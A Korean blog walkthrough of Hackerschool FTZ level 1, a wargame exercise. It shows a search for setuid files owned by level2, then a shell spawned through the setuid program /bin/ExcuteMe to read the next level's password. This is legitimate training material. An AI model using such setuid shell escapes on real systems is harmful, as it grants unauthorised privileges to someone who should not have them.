level1 / level1
[level1@ftz level1]$ cat hint
level2 권한에 setuid 가 걸린 파일을 찾기 위해 find 명령어를 이용하여 찾는다.
[level1@ftz level1]$ cat hint
level2 권한에 setuid가 걸린 파일을 찾는다.
level2 권한에 setuid 가 걸린 파일을 찾기 위해 find 명령어를 이용하여 찾는다.
[level1@ftz level1]$ find / -user level2 -perm -4000 2>/dev/null
/bin/ExcuteMe
[level1@ftz level1]$ /bin/ExcuteMe
레벨2의 권한으로 당신이 원하는 명령어를
한가지 실행시켜 드리겠습니다.
(단, my-pass 와 chmod는 제외)
어떤 명령을 실행시키겠습니까?
[level2@ftz level2]$ sh
sh-2.05b$ id
uid=3002(level2) gid=3001(level1) groups=3001(level1)
sh-2.05b$ my-pass
Level2 Password is "hacker or cracker".
'컴퓨터 > hackerschool' 카테고리의 다른 글
hackerschool level 6 (0) | 2012.02.17 |
---|---|
hackerschool level 5 (0) | 2012.02.17 |
hackerschool level 4 (0) | 2012.02.13 |
hackerschool level 3 (0) | 2012.02.13 |
hackerschool level 2 (0) | 2012.02.13 |
댓글